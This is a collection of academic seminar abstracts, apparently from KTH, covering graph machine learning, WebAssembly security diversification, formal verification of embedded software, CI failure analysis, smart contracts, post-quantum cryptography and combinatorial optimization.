Graph structures are ubiquitous and help us to understand many complex real-world applications. Graph Machine Learning (GML) is a branch of computer science that aims to understand a graph's hidden relations and structure and use them to provide powerful graph models for prediction, clustering, and classification tasks. Graphs are also capable of explaining complex behavior by analyzing graph models at the macro level or by studying the interaction of nodes and edges at the micro level. The theme of this seminar is to learn and understand the global and local behavioral properties of complex systems by modeling their graph structure. To achieve this, we investigate the graph structures of complex systems in two real-world domains - (i) Software Testing in Software Engineering and (ii) Cell Graph Modeling in Digital Pathology.
For tasks in the software testing domain, we use control flow graphs (CFGs) for understanding global behavioral properties such as (i) reverse engineering software requirements (metamorphic relations) and (ii) estimating code similarity. In the area of digital pathology, we generate cell graphs from digitized medical tissue images, where each node represents a cell nucleus and edges represent the spatial relationship between two cell nuclei. Cell-graphs can be used to understand tissue structure and function in histology.
In this seminar, we show that both global and local behavior properties of complex systems can be modeled from their graph structure using GML techniques. However, to achieve higher performance, it is critical to consider relevant: attributes, embeddings, topologies, and architectures.
Javier Cabrera (KTH) | 10:00 in Fantum Room and https://kth-se.zoom.us/j/64627724629
Since its 2015 inception, WebAssembly (Wasm) has experienced swift integration, with languages such as Rust and C/C++ now compiled to Wasm and compatible with all major browsers. Crucially, Wasm's adoption extends beyond browsers, with platforms like Fastly and Cloudflare incorporating it into their core services. However, vulnerabilities have been detected in Wasm's implementations, both in browsers and standalone runtimes, mostly due to software monoculture.
Our work explores software diversification as a proactive solution to address these vulnerabilities. We generate hundreds of variants that share functionality, while exhibiting diverse execution behaviors. This presentation outlines four contributions in this area.
First, we discuss our CROW, a superdiversification engine for Wasm implemented within the LLVM compilation pipeline. Second, we introduce MEWE, which embeds multiple variants into a single program, supporting runtime randomization. MEWE has been evaluated on worldwide content delivery network. Third, considering the evolving landscape of Wasm tools and the introduction of new compilers outputting Wasm binaries via non-LLVM methodologies, we unveil a Wasm-to-Wasm diversification solution, wasm-mutate. We demonstrate how it can be used to prevent Spectre attacks on WebAssembly programs. Finally, we demonstrate how commercial solutions' are inaccurate in detecting Wasm cryptomalwares variants and how diversification can be used to rectify this.
Jesper Amilon (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/62505868883
Within embedded systems software, correctness relies mainly on testing techniques. While testing may serve well as a bug-catcher, it cannot be used to formally prove their absence. For this, an exhaustive method, i.e., formal verification, is required. However, the cost and level of skill needed for formal verification means that it is often overlooked by the industry. Furthermore, several common software aspects, a prominent one being floating point arithmetic, are not well-supported by state-of-the-art tools. In this seminar, we present our work on formal verification of embedded-systems software at the Swedish heavy-vehicle manufacturer Scania, where we focus on automating the verification process to allow for easier integration of formal verification into the development chain. To this end, we present work on automatic verification of properties of arrays in C programs and automated verification of properties of C arrays. We will also discuss an approach for combining deductive verification and model checking. Lastly, we outline future research plans, including in particular verification of C programs with floating point arithmetic.
Han Fu | 13:00 in Room 4523 and https://kth-se.zoom.us/j/6236541995
Automated continuous integration (CI) process faults can severely impact industrial code development. We investigated CI failures in four large industrial projects to enhance efficiency, reliability, and maintainability. Analyzing 11,731 builds over six months, we identified 1,414 failing builds and found that compilation errors accounted for 47% of failures, followed by testing at 36%. We also discovered 14 distinct types of testing failures and highlighted configuration problems as significant issues. To delve deeper, we utilized the "Shadow Job" CI diagnostics solution, examining 40,000 commits and categorizing compiler errors into 14 types. The five most common errors comprised 89% of all compiler errors. Our study also explored the localizability and repairability of errors, revealing their independence from resolution time, size, and distance. Furthermore, we provided insights into the human effort required to fix common compilation errors, suggesting a prioritization strategy based on error frequency and repair effort.
Our future focus is reducing failing tests and compilation errors caused by configuration and dependency problems. We will first aim to implement automatic fault localization and program repair techniques to address compilation errors resulting from configuration and dependency issues. Enhancing our "Shadow Job" implementation, we plan to develop automated solutions for error resolution, leveraging advanced techniques like neural networks and large language models. Furthermore, we will expand our study to include additional projects and companies to validate our findings and ensure broader applicability.
Amir Ahmadian (KTH) | 13:00 in Room 1537 and https://kth-se.zoom.us/j/5089122904
Our world today heavily relies of software systems. They are used in almost every aspect of our society and thus securing them is a crucial and important task. Numerous factors influence the security of a program in a particular setting, including the interplay between the program's building components, the unique threats present in that particular setting, and relevant attacker models and security policies.
In this seminar I will be presenting my research on the security of software systems under real-world policies and attacker models.
In the first part of the presentation, I will provide an overview of my research on dynamic policies and the effects of changing the security policy during the execution of a program. I will discuss different attacker models and investigate their effects on our definition of security. Next, I will provide an overview of my research on the security of programs executed on trusted execution environments (TEE). The security guarantees of a TEE, relevant attacker capabilities, and their effect on the security of the programs are discussed in this part.
In the second part of the presentation, I will be discussing my research on disjunctive policies in database-backed programs. I will explore models to understand the semantics of disjunctive security policies in database-backed programs, and propose a provably-sound static enforcement mechanism to check these disjunctive policies.
Prof. David Sands from Chalmers (https://www.cse.chalmers.se/~dave) will be joining the seminar as the discussion leader.
Virgil Gligor (CMU) | 16:00 in Room 4523 and https://kth-se.zoom.us/j/6529956822
Suppose that a trustworthy program must be booted on a commodity system that may contain persistent malware in the firmware of its device controllers. Establishing software root of trust (RoT) assures that the system’s firmware has all and only the content chosen by a trusted external verifier, or the verifier discovers unaccounted content, with high probability. Hence, RoT establishment assures that trustworthy program boot can take place in a malware-free firmware state. This is challenging because device controller malware can survive in system states across repeated secure- and trusted-boot operations and act on behalf of a powerful remote adversary. Furthermore, anti-malware tools do not have malware-unmediated access to device controllers’ firmware and thus must interact with devices controllers as with any “black box;” e.g., attempts to re-flush firmware a black-box firmware offers no guarantee of malware erasure nor prevents malware connections over the internet. I this presentation, I will illustrate both the theoretical and practical challenges of RoT establishment unconditionally; i.e., without secrets, privileged modules (e.g., TPMs, RoMs, HSMs), or adversary computation bounds. The approach proposed offers the only unconditional solution known to any security or cryptography to date.
Mojtaba Eshghie (KTH) | 13:00 in Room 1440 and https://kth-se.zoom.us/j/7998785238
Smart contracts manage blockchain assets. While smart contracts embody business processes, their platforms could be more process-aware. Mainstream smart contract programming languages such as Solidity do not have explicit notions of roles, action dependencies, and time. Instead, these concepts are implemented in program code. This makes it very hard to design and analyze smart contracts. We argue that DCR graphs are a suitable formalization tool for smart contracts because they explicitly and visually capture these features. We utilize this expressiveness to show that many common high-level design patterns in smart-contract applications can be naturally modeled this way. Applying these patterns shows that DCR graphs facilitate the development and analysis of correct and reliable smart contracts by providing a clear and easy-to-understand specification. Also, we'll talk about the uses of these designs for monitoring smart contracts.
Shravan Narayan (UT Austin) | 16:30 in Zoom
Most systems we use today are wildly insecure. This past year attackers have exploited bugs in systems like browsers and operating systems to steal user data, shut down hospitals, and stalk activists. Attackers are winning because bugs in a seemingly unimportant component like the browser's spell-checker can be used to compromise the entire browser.
In this talk, I will describe my work retrofitting existing systems towards secure design. First, I will describe RLBox, a type-driven sandboxing framework that ships in the Firefox browser. RLBox helps Firefox engineers retrofit the browser to sandbox third-party libraries and safeguard its users from attacks that exploit vulnerabilities from these libraries. Then I will describe my work on VeriWasm analysis tool and Swivel compiler which together secure edge cloud platforms against attacks that exploit compiler bugs and micro-architectural vulnerabilities like Spectre. Along the way, I will describe the challenges and research questions that only arise when trying to deploy principles techniques (e.g., from programming languages and system design) to secure huge systems like Firefox.
Camilla Björn (KTH) | 13:15 in Room 4523 and https://kth-se.zoom.us/j/64269201723
Progression is an established and important concept in curriculum development for professional education programmes. But despite its frequent usage, it is surprisingly unclear what it means in this context and how it can be utilised to optimise the fulfilment of the programme learning outcomes. There are several disambiguations of the concept, such as the idea of viewing progression as programme retention or course completion, or the constructive alignment between courses. However, there are other ways of viewing progression in professional education and there are also different aspects of progression to focus on when considering the constructive alignment between courses, such as increased scope (the depth and breadth of knowledge), increased ability to utilise the knowledge and skills in practice and increased proficiency in different skills.
In this 30% seminar, Camilla will present her research plan for her PhD project focusing on conceptualising progression in professional education with an emphasis on computer science education. Her project consists of four subprojects which will be explained in detail during the seminar including the work that is already completed.
Javier Ron (KTH) | 16:30 in Room 1440 and https://kth-se.zoom.us/j/66050844902
As all software, blockchain nodes are exposed to faults in their underlying execution stack. Unstable execution environments can disrupt the availability of blockchain nodes interfaces, resulting in downtime for users. This paper introduces the concept of N-version Blockchain nodes. This new type of node relies on simultaneous execution of different implementations of the same blockchain protocol, in the line of Avizienis’ N-version programming vision. We design and implement an N-version blockchain node prototype in the context of Ethereum, called N-ETH. We show that N-ETH is able to mitigate the effects of unstable execution environments and significantly enhance availability under environment faults. To simulate unstable execution environments, we perform fault injection at the system-call level.
Our results show that existing Ethereum node implementations behave asymmetrically under identical instability scenarios. N- ETH leverages this asymmetric behavior available in the diverse implementations of Ethereum nodes to provide increased availability, even under our most aggressive fault-injection strategies. We are the first to validate the relevance of N-version design in the domain of blockchain infrastructure. From an industrial perspective, our results are of utmost importance for businesses operating blockchain nodes.
Jimmy Koppel | 13:30 in Room 1440 and https://kth-se.zoom.us/j/63233589327
Programming languages researchers have developed many advanced tools that promise to greatly ease software engineering. Yet even conceptually simple tools are expensive to implement fully due to the complexity of the target language, and standard techniques tie an implementation to a particular target language. In order to make the development of advanced programming tools economical, these problems demand new techniques for decomposing the development of tools and automating portions of their construction, which I collectively dub “meta-metaprogramming."
In this talk, I will present my work on new techniques and frameworks for making tools easier to build and more general, and tools built on them. First I will present Cubix, a "One Tool, Many Languages" framework that allows a single tool to quickly be written for multiple programming languages. We have used Cubix to build Yogo, a semantic search tool capable of finding equivalent patterns in C, Java, and Python from a single shared query. Second, I will present Mandate, the world's first control-flow graph generator generator, able to generate multiple varieties of CFG-generator given a programming language's formal semantics. Finally, I will present our ongoing work on ECTAs (equality-constrained tree automata), a new type of data structure/constraint-solver able to efficiently search large spaces of programs subject to certain constraints. We have used ECTAs to build two synthesizers for Haskell, Hectare and Spectacular, which solidly beat their pre-existing competitors (Hoogle+ and QuickSpec) with only a fraction the engineering-effort.
Christian Lidström (KTH) | 13:15 in Room 1440 and https://kth-se.zoom.us/j/2440183377
In this seminar I will present the outline of my thesis, and describe the published and planned papers to be included. The focus of the thesis is automated verification of embedded software, and in the talk I will also briefly discuss the details of the work performed to this end. Today, embedded systems are increasingly large and complex, and in many cases of a safety-critical nature, as is the case in, for example, the automotive industry. For this reason, traditional methods of ensuring correctness, such as testing, may be insufficient. On the other hand, formal methods, such as deductive verification, are largely considered prohibitively expensive in the industry, because of the amount of expertise and manual work required. To deal with this, we have firstly developed a formal framework for compositionally designing embedded systems, with a focus on procedural software components, where high-level system properties can be decomposed into lower-level software properties and then formally verified. Secondly, we have developed techniques to automate the low-level software verification, focusing on automatic inference of function contracts to be used in deductive verification, as well as combining deductive verification with other techniques.
Marcus Schmidt Birgersson (KTH) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/6256056515
Smart devices, so-called IoT devices, produce a lot of data of various kinds. These devices are in general limited both in terms of storage and processing power. This means that this data in most cases are transported to the cloud where it can be both stored and analyzed. To protect data stored in the cloud, while still being able to perform arbitrarily computations, we present a system for secure multiparty computation by the means of trusted execution environments. Principals store encrypted data in a middleware located in the cloud and provide ac- cess to a subset of this data to a trusted execution platform provided by some party that needs an aggregation of this data, the receiver. This access is given by the principals by providing the TEE with the decryption keys. By the means of remote attestation, the principals can verify that the correct computation will be carried out. Our system allows for evaluating any computation over mutually distrusting princi- pals’ data without any complex secret sharing schema. We allow for users to be added and removed at any time and no user needs to be online and active at the time of computation. For our system to work in a secure and confidential way, we assume that the middle- ware that stores the data does not cooperate with the receiver. If they do, this sets extra requirements on the aggregation function to be able to prevent such attacks. Potential solutions for this involve tools from differential privacy or statistics in general. I will end the talk by reasoning about how we can use this to further improve the security guarantees for our system.
Zimin Chen (KTH) | 10:30 in Room 4523 and https://kth-se.zoom.us/j/69265621933
Machine learning techniques are increasingly being applied to software engineering tasks such as program generation and repair. However, the design of effective input and output representations is a critical aspect of these models. Since the size of the input and output of any machine learning models are subjective to memory and computation constraints. In this presentation, we will discuss our recent research papers that propose novel approaches for designing input and output representations of machine learning for software engineering models.
Joel Gärtner (KTH) | 10:00 in Room 1440 and https://kth-se.zoom.us/j/6293265597
Quantum computers are currently under active development and may soon be capable of solving certain problems that are believed to be infeasible to solve with classical computers. In particular, Shor's algorithm is a famous quantum algorithm that allows a sufficiently powerful quantum computer to break essentially all asymmetric cryptography that is currently being used. Therefore, there is a need for post-quantum secure cryptographic algorithms, that are not only secure against classical adversaries but also against those with access to large quantum computers.
Some of the primary candidates for post-quantum cryptography are based on the assumed hardness of variants of the Learning with Errors (LWE) problem. The LWE problem can be seen as a random instance of a special type of a lattice problem, and LWE-based cryptosystems are secure if this problem is infeasible to solve. The hardness of the LWE problem is asymptotically supported by a reduction that shows that a random LWE instance is hard as long as there exists a hard instance of a standard lattice problem. However, this reduction has in practice not been able to support the security of any concrete cryptosystem. In this talk, I will discuss post-quantum lattice-based cryptography, what reductions may say about the security of typical lattice-based cryptosystems and how I have been able to parametrize a scheme with security actually based on the worst-case hardness of a standard lattice problem.
Ning Dong (KTH) | 13:15 in Room 4523, and https://kth-se.zoom.us/j/5937312883
Computing devices have become an indispensable part of people’s daily life. In order to build a trustworthy stack, both hardware and software are necessary to consider. Accordingly, my research focuses on low-level hardware and software in the computing system by applying formal verification. In this presentation, I will briefly introduce my finished work: formal verification of an I/O device and its driver, and the executable semantics of the MIL (Machine Independent Language) formalization. The first work studied the Serial Peripheral Interface (SPI) and device-to-device information flow. The MIL work is a formal platform for reasoning about the information flow of low-level programs on the microarchitecture level, and checking information leakage caused by microarchitecture features like out-of-order execution. The executable semantics is used to evaluate MIL programs' execution and partially automate the conditional noninterference proof. The central part is the formal approach to verify in-order pipelined processor circuits. We have developed and verified a pipelined processor in the interactive theorem prover HOL4. I will present how we address general pipeline challenges and how to handle them in the correctness proof.
Anoud Alshnakat (KTH) | 13:15 in Room 1537 and https://kth-se.zoom.us/my/anoud
The emergence of Software-Defined Networking (SDN) has enabled the programming of network device data planes through specialized languages such as P4. However, this flexibility in programming can result in network correctness issues due to potential errors in P4 programs. Our aim is to provide insights into the formal verification of P4 programs and their potential to enhance the correctness of data planes.
To this end, we have developed HOL4P4, a formalization of P4 semantics using the interactive theorem prover HOL4. This semantics provides a formal foundation for the verification of P4 software. We have also introduced a type system to ensure the progress of P4 programs.
In this seminar, I will cover the main building blocks of the HOL4P4 semantics and provide illustrative examples. Furthermore, I will present the type system and discuss the challenges faced in its development. Finally, I will discuss our planned work and possible future work, including the obstacles that need to be overcome to develop P4 proof-producing verification tools.
Matthías Páll Gissurarson (Chalmers) | 11:00 in Room 1440 and https://kth-se.zoom.us/j/61671598890
Automatically repairing programs is difficult, especially when the program space we have to search is huge. In this talk, I'll describe how a strongly typed language like Haskell allows us to narrow the search space to a more manageable size, a data structure known as an ECTAs that allows us to efficiently represent such entangled program spaces, and how these can be used for automatic program repair and test synthesis based on property-based testing.
Mohammad M. Ahmadpanah (Chalmers University of Technology) | 11:00 in Room 4423 and Zoom
Trigger-Action Platforms (TAPs) empower applications for connecting otherwise unconnected devices and services. The current TAPs like IFTTT require trigger services to push excessive amounts of sensitive data to the TAP regardless of whether the data will be used in the app, violating the principle of data minimization. Furthermore, the rich features of modern TAPs, including IFTTT queries to support multiple trigger services and nondeterminism of apps, have been out of the reach of previous data minimization approaches like minTAP. In this talk, I will present LazyTAP, a new paradigm for fine-grained on-demand data minimization. LazyTAP breaks away from the traditional push-all approach of coarse-grained data over-approximation. Instead, LazyTAP pulls input data on-demand, once it is accessed by the app execution. Thanks to the fine granularity, LazyTAP enables tight minimization that naturally generalizes to support multiple trigger services via queries and is robust with respect to nondeterministic behavior of the apps. We achieve seamlessness for third-party app developers by leveraging laziness to defer computation and proxy objects to load necessary remote data on-demand and behind the scenes. We formally establish the correctness of LazyTAP and its minimization properties with respect to both IFTTT and minTAP. We implement and evaluate LazyTAP on a mixture of real and synthetic app benchmarks showing that on average LazyTAP improves minimization by 95% over IFTTT and by 38% over minTAP, while incurring a tolerable performance overhead.
Romy Tsoupidi | 10:00 in Room 1537 and https://kth-se.zoom.us/j/66518599125
Increased digitalization of services and the popularity of the Internet of Things (IoT) put increasing demand on system cybersecurity. The vulnerabilities that enable malicious actors to perform cyberattacks are often present in the binary code that runs on the target device. Such attacks include code-reuse attacks and side-channel attacks. The former reuse binary code snippets to stitch a payload that performs a malicious attack. The latter use so-called side channels, such as execution time or power consumption, to infer secret information. These attacks depend largely on the low-level code that the machine executes and this code typically depends on compilers. Compilers perform semantic-preserving transformations that aim at improving the performance, reducing the size, or minimizing the energy consumption of the generated code. However, general-purpose compiler transformations often do not preserve security properties, while state-of-the-art approaches to secure compilation do not achieve highly optimized code. We propose a method that allows the compiler to preserve security properties and, at the same time, achieve highly optimized code.
In this talk, I will present my work on securing optimized code and code verification on WebAssembly code. In particular, I will talk about 1) execution-time-aware software diversification against large-scale code-reuse attacks, 2) optimizing code against power side channels, 3) combining efficiency-aware compiler-based security migitations, and 4) verifying constant-time programs in WebAssembly. The first work presents a code diversification approach that operates at the machine-lever intermediate representation using a combinatorial compiler backend to achieve fine-grained diversification at the function level, while controlling the execution-time overhead of the generated code. The second work describes an approach on optimizing (performance) software-masked code, while preserving security properties that hinder power-side channels. The third work presents an approach to software diversification to generate secure and optimized code against code-reuse attacks and side-channel attacks. Finally, the last work is an approach to verify the constant-time property, which mitigates timing side-channel attacks at the WebAssembly level using relational symbolic execution. WebAssembly is a recent low-level language for the Web and is the target of many security-critical and performance-demanding Web applications.
The material for these works, including the relevant publications (one publication that is under submission is not available on the Website) are available at: https://romits800.github.io/publications.html.
Didrik Lundberg (KTH) | 10:00 in Room 4523 and https://kth-se.zoom.us/j/63683731064
The broad topic of my research is creating the infrastructure for formal verification of low-level system software, device drivers and programmable network elements with provable security guarantees using an interactive theorem prover (ITP). Specifically, this is in the context of network and communications solutions. Part of this challenge is to incorporate precise models of various types of architectures and external or auxiliary components and make them available to be used in an interactive theorem prover together with different pieces of code. This is not merely a practical issue, but rather a question of how to formalize into theorems just how various components are interdependent in an unstructured setting, and how to formulate modular abstractions from which you can easily add and remove external components. In particular, for programmable network elements, the data plane and the control plane together with other external functionality should be made modularly composable.
Concretely, this is realized by implementation in the ITP HOL4 of unstructured program logics, a formalization of the P4 language (with associated tools) and extensions of the HolBA toolbox, most importantly to weak memory models for the multicore setting.
Guangyi Zhang | 13:30 in F3, Lindstedtsvägen 26 and https://kth-se.zoom.us/j/69024442639
Submodular functions characterize mathematically the ubiquitous ``diminishing-returns'’ property. They are widely used to describe core subjects in numerous applications, including economic utility, redundancy in information, spread of influence in social networks, and more. Optimization of submodular functions thus plays a central role in a broad range of applications in data science. However, existing works concentrate largely on optimizing a single submodular function, with a sole focus on succinct subset selection among massive data. Other circumstances have not been fully explored, for example, when there exists interplay between a submodular function and other components.
In this thesis, we study optimization beyond a single (non-decreasing) submodular function in the following three areas.
Ranking: Ranking arises naturally in the presence of multiple submodular functions, for instance, when a list of shared resources is sequentially served to satisfy multiple submodular demands with individual budgets. One concrete example is ranking web pages to satisfy multiple user intents with different ``patience.'' We first study this ranking problem under cardinality constraints, and then we consider extensions of the basic setting, including knapsack constraints, streaming settings, and robustness requirements.
Decision trees: A tree (or a policy) can be seen as an adaptive generalization of ranking. Popular decision trees for classification, including CART and C4.5, are constructed by recursive greedy splits, guided by some impurity function. These trees are accurate, but may not be easy to understand due to a potentially large tree size. A novel characterization of a decision tree is via adaptive intersection among multiple submodular functions, one for each object to be classified. We discover that this characterization enables one to analyze and control the tree complexity for a large family of impurity functions. As a consequence, we are able to produce accurate and interpretable decision trees with bounded complexity.
Diversity: Multi-objective optimization is frequently encountered in reality. One specific important form is a joint optimization of utility and diversity, where utility is often modeled by a submodular function. From the theoretical side, we discuss new techniques for such joint optimization over clustered input; from the practical side, we propose one novel application in learning diverse rule sets, where diversity encourages non-overlapping rules that deliver desirable unambiguous decisions.
For each of the three areas discussed above, we introduce novel formulations for applications in data science, and devise algorithms that are efficient, easy to implement, and have provable approximation guarantees. In addition to theory, we also highlight their practical potential by presenting empirical performance in selected applications. Our work significantly enhances the modeling capabilities of submodular optimization for novel application domains.
More info can be found in Diva: http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-322458
Joakim Blikstad | 15:00 in Room 4523 and https://kth-se.zoom.us/my/blikstad
Joakim Blikstad will present recent developments in matroid intersection algorithms. Matroid intersection is a fundamental combinatorial optimization problem which can model a range of problems, e.g. bipartite matching or packing spanning-trees / arborescences.
We obtain faster matroid intersection algorithms by studying a specific graph reachability problem, for which we show new and simple algorithms. The exact complexity of this reachability problem, however, remains open. Combining our graph reachability algorithms with recent approximation algorithms, we manage to obtain the first subquadratic matroid intersection algorithms, thus breaking the "quadratic barrier".
No background about matroid intersection is needed for the talk.
The talk is mostly based on the STOC'21 paper "Breaking the Quadratic Barrier for Matroid Intersection", (https://arxiv.org/abs/2102.05548. Joint work with Jan van den Brand, Sagnik Mukhopadhyay and Danupon Nanongkai) but also on the ICALP'21 paper "Breaking O(nr) for matroid intersection", ICALP'22 paper "Sublinear-round parallel matroid intersection" and a recent paper "Fast Algorithms via Dynamic-Oracle Matroids" still in submission.